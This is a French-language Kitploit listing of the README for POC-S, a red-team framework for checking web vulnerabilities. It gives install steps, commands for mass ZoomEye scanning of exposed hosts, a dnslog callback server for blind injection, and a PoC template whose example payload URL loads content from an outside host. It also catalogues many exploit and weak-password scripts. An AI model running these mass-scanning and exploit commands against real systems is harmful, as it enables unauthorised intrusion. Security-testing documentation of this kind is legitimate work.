Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
POC-S — POC-S, version renforcée de POC-T, est conçu pour valider rapidement les vulnérabilités des applications Web lors de confrontations red team/blue team. Il comprend des fonctionnalités renforcées, l'ajout et la classification de scripts, ainsi qu'un dnslog intégré, etc. La plateforme est complétée par des POC à haute disponibilité issus des machines cibles vulhub et d'autres projets open source. | Kitploit
Outils/GitHubGitHub/jiangsir404/poc-s
ReconnaissanceScanners de VulnérabilitésFrameworks d'ExploitationCollecte d'InformationsSécurité WebFuzzingTests d'IntrusionAnalyse DNS
GitHubjiangsir404/poc-s

POC-S

Voir le dépôt
35664il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

POC-S, version renforcée de POC-T, est conçu pour valider rapidement les vulnérabilités des applications Web lors de confrontations red team/blue team. Il comprend des fonctionnalités renforcées, l'ajout et la classification de scripts, ainsi qu'un dnslog intégré, etc. La plateforme est complétée par des POC à haute disponibilité issus des machines cibles vulhub et d'autres projets open source.

Partager

POC-S: POC-T Strengthen Version (Version renforcée de POC-T)

La documentation wiki de POC-T est dans le dossier doc.

Préface : Actuellement

Avis de non-responsabilité légal

Utiliser POC-S pour attaquer une cible sans consentement préalable des deux parties est illégal. POC-S est uniquement destiné à des fins de test de sécurité.

Caractéristiques

  • Compatible avec la syntaxe de POC-T
  • Bonne classification des PoC, méthode de chargement flexible, prend en charge le chargement de fichiers uniques, par lots, depuis n'importe quel répertoire.
  • Fournit les commandes terminal pocs/poc-s, sépare le framework du PoC, permet de placer les PoC personnalisés dans n'importe quel répertoire.
  • Fournit une plateforme DNS simple, nécessitant seulement un nom de domaine et une IP publique pour fonctionner, peut être utilisée pour vérifier rapidement les injections de commandes aveugles et les injections SQL aveugles, simple et efficace.
  • Fournit de bons scripts de tests unitaires

TODO

  • Collecter et améliorer les PoC à partir de Vulhub et de projets open source, voir ma classification des PoC pour plus de détails.
  • Fournir le paramètre --init pour mettre à jour dynamiquement le fichier de configuration tookit.conf, par exemple : --init zoomeye, initialise la configuration de ZoomEye.
  • Ajouter les plateformes dnslog et weblog pour une vérification rapide des vulnérabilités.
  • Ajouter les plugins de vérification ceye.py et dnslog.py.
  • Ajouter pocsapi.py, fonctionnalités similaires à sqlmapapi.
  • Ajouter la version py3 de POC-S.

Utilisation

Étant donné que les interfaces tierces nécessitent une authentification, vous pouvez utiliser le paramètre --init pour initialiser la configuration de votre interface, par exemple : --init zoomeye

root@kitploit:~
	pip install pocs

Installation depuis les sources :

root@kitploit:~
git clone https://github.com/jiangsir404/POC-S.git
mv pocs/toolkit.conf.bak mv pocs/toolkit.conf
python setup.py install

Si l'installation de pocs avec pip renvoie une erreur "Some files missing", vous devez vous rendre dans le répertoire d'installation de pocs (python2.7\Lib\site-packages\pocs) et renommer tookit.conf. Si l'erreur WARNING: Generating metadata for package cachetools produced metadata for project name unknown. Fix your #egg=cachetools fragments. apparaît, il s'agit d'un problème de dépendance de paquet. Veuillez vérifier et mettre à jour les versions de ces paquets : setuptools==39.0.1, cachetools==3.1.1, google-api-python-client==1.7.11.

  1. Méthode de chargement de plugins plus flexible
root@kitploit:~
pocs -s test/test2.py -iS 127.0.0.1 #加载script/test/test2.py脚本
pocs -s test2 -iS 127.0.0.1 # 加载script/test2.py脚本

pocs -b test -iS 127.0.0.1 # 批量加载/script/test目录下的所有脚本
pocs -b test -s test2.py -iS 127.0.0.1 #加载script/test/test2.py脚本

pocs -s myself_script.py -iS 127.0.0.1 # 加载自定义的脚本和脚本目录
pocs -b mydir -iS 127.0.0.1
  1. Utilisation des moteurs de recherche
root@kitploit:~
pocs --init zoomeye //初始化zoomeye的配置信息
pocs -b redis -t 50 -aZ "port:6379" --limit 50 -o res.txt
pocs -s test2.py -aZ "ThinkPHP"

Utilisation de ZoomEye pour rechercher en masse la vulnérabilité CNVD-2020-10487 (tomcat ajp lfi).

root@kitploit:~
pip install pocs
pocs -b apache -aZ "app:tomcat" --limit 50 -t 30 -o ajp.txt

  1. Utilisation de la plateforme dnslog

Si vous êtes toujours préoccupé par l'instabilité de ceye et que vous n'avez pas le temps ou l'énergie de construire une plateforme DNSLog (nécessite deux noms de domaine, une IP publique, et le nom de domaine doit pouvoir modifier les serveurs DNS), alors pourquoi ne pas essayer la plateforme dnslog simple fournie par POC-S, qui ne nécessite qu'un nom de domaine et une IP publique pour être construite, et fournit une interface API pour la vérification (sans interface utilisateur).

Supposons que dnslog.xxx.cn soit votre nom de domaine public et x.x.x.x votre IP publique, assurez-vous que dnslog.xxx.cn puisse résoudre correctement en x.x.x.x, sinon l'API ne sera pas accessible.

Exécutez la commande sur l'IP publique (x.x.x.x) :

root@kitploit:~
pip install pocs
pocs_dnslog -h 0.0.0.0 -p 88(如果不是pip安装的可以直接运行pocs.dnslog.py脚本)
>>> dns domain: dnslog.xxx.cn
>>> api key: rivir
>>>dns ip: x.x.x.x

La commande dns log ne prend en charge que la commande nslookup : nslookup 1234.dnslog.xxx.cn x.x.x.x

Si vous souhaitez utiliser la commande ping 1234.dnslog.xxx.cn, vous pouvez également configurer un serveur de noms personnalisé pour le domaine xxx.cn (consultez la configuration de DNSLog).

Commande web log : curl http://dnslog.xxx.cn:88/weblog/poc123

Adresse de l'API : http://x.x.x.x:88/api/?token={token}&type={dns}&filter=1234.dnslog.xxx.cn Paramètres : - token : obligatoire, l'api_key saisi lors de la construction du dnslog. - type : obligatoire, valeurs possibles : dns/web. - filter : facultatif, filtre les enregistrements, correspondance exacte.

PoC

pocs offre une classification des plugins plus flexible. Actuellement, il existe quatre catégories de PoC : Fuzz PoC, OWASP PoC, Vuln PoC, Tool PoC. Cette section PoC essaiera de collecter certains PoC existants sur GitHub, mais pas trop, il appartient à chacun de collecter et organiser. f

La rédaction des PoC sera aussi normalisée que possible, suivant le style de rédaction de POC-T. Exemple ci-dessous :

root@kitploit:~
#!/usr/bin/env python		
#coding:utf-8

"""
ThinkPHP5 <=5.0.22/<=5.1.29 远程代码执行漏洞

Desc
    2018年12月10日中午,thinkphp官方公众号发布了一个更新通知,包含了一个5.x系列所有版本存在被getshell的高风险漏洞。
    由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,
    受影响的版本包括5.0.23和5.1.31之前的所有版本,推荐尽快更新到最新版本。
Version
	ThinkPHP5.0 版本 <= 5.0.22 ThinkPHP5.1 版本 <= 5.1.29
Usage:
	1. python POC-S.py -s 
	2. POC: /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://lj.s7star.cn/info.txt
Referer
	https://www.seebug.org/vuldb/ssvid-9771
"""

import requests

def poc(url):
    pass

Vuln PoC

Principalement issus de l'écriture de plugins pour vulhub et des plugins PoC intégrés à POC-T, seuls des PoC très utilisables sont ajoutés. Chaque PoC listé ci-dessous a été vérifié en construisant l'environnement un par un. Si un PoC est erroné, veuillez ouvrir une issue pour me contacter.

  • struts2
    • s2-005.py
    • s2-015.py
    • s2-016.py
    • s2-032.py
    • s2-045.py
    • s2-052.py
    • s2-053.py
    • s2-057.py
    • struts2-devmode.py
  • weblogic
    • weblogic-ssrf-netmap.py cve-2014-4210
    • weblogc-cve-2017-10271.py (CVE-2017-10271)
    • weblogic-cve-2018-2628.py
    • weblogic-cve-2019-2725.py
    • weblogic-cve-2019-2729.py

Fuzz POC

Source : boy-hack/POC-T

  • bakfile: Détection de fichiers de sauvegarde
  • crossdomain: crossdomain
  • dzxss
  • gitleak
  • issparse
  • ms15-034
  • phpinfo
  • phpmyadmin
  • svnleak
  • swf
  • tomcat_xmlleak
  • wordspace

OWASP POC

Source : scripts de détection de hunter

  • cmd_exec
  • sql_injection
  • xss
  • xxe
  • csrf
  • jsonp_xss
  • jsonp_hijacking
  • file_read
  • ssti
  • ssrf

Tool Poc

Quelques PoC d'outils courants, fournissant des moteurs de recherche et des fonctions de recherche d'information.

  • bing-dork : recherche Bing
  • bingc : recherche inversée d'IP en nom de domaine basée sur le moteur de recherche Bing, domaines de classe C
  • google-dork : recherche Google
  • cdn-detect : détection CDN
  • waf : détection WAF et retourne les URL sans WAF
  • craw : extrait les adresses pertinentes des liens
  • vulscan : détection des vulnérabilités d'injection SQL
  • portscan : scan de ports, détection des services à mots de passe faibles
  • domain2ip : résolution de nom de domaine en IP
  • whois : consultation des informations WHOIS
  • icp : requête ICP

D'autres PoC open source comme ceux du projet https://github.com/boy-hack/airbug sont disponibles et peuvent être utilisés directement, mais il y a une bibliothèque HackRequest qui est en py3, elle doit être modifiée pour Python 2. Vous pouvez installer directement ma bibliothèque modifiée pour py2 : https://github.com/jiangsir404/hack-requests

Télécharger l’outil
  • weblogic-cve-2020-2551.py
  • weblogic-upload-getshell.py (CVE-2018-2894)
  • thinkphp
    • 5-rce
    • 5.0.23-rce
  • Jenkins
    • jenkins-cve-2015-8103.py
    • jenkins-cve-2017-1000353.py
    • jenkins-cve-2018-1000861.py
  • weakpass
    • mysql
    • redis
    • mongo
    • sqlserver
    • ftp
    • telent
    • Mots de passe faibles web (backend général sans CAPTCHA)
    • http-basic-auth
    • coremail
    • jboss
    • jenkins
    • weblogic
  • unauth
    • redis-unauth.py
    • mongodb-unauth.py
    • memcached-unauth.py
    • elasticsearch-unauth.py
    • kubernetes-unauth.py
    • jenkins-unauth.py
    • docker-unauth-rce.py
    • hadoop-unauth.py
  • apache
    • CNVD-2020-10487 tomcat-ajp-lfi.py
    • tomcat-upload.py
    • tomcat-weak-pass.py
  • Citrix
    • cve-2019-19781
  • supervisor
    • supervisord-RCE-CVE-2017-11610.py
  • Jboss
    • jboss-rce.py
    • CVE-2017-12149
    • CVE-2013-4810
  • spring
    • spring-oauth2-rce.py
    • cve-2018-1273
  • phpmyadmin
    • phpmyadmin-auth-rce.py
    • phpmyadmin4.8.1-RFI.py
  • kibana
    • cve-2019-7609
    • cve-2018-17246
  • php
    • fpm-rce.py
    • CVE-2019-11043
    • CVE-2018-19518
  • discuz
    • x3.4-arbitrary-file-deletion
  • zabbix
    • zabbix-jsrpc-mysql-exp.py
    • zabbix-jsrpc-sqli.py
    • zabbix-weakpass.py
    • zabbix_latest_sqli.py
  • dns-zone-transfer
  • confluence
    • confulence-traversal.py
    • Vulnérabilité de traversée de chemin et d'exécution de commandes dans Confluence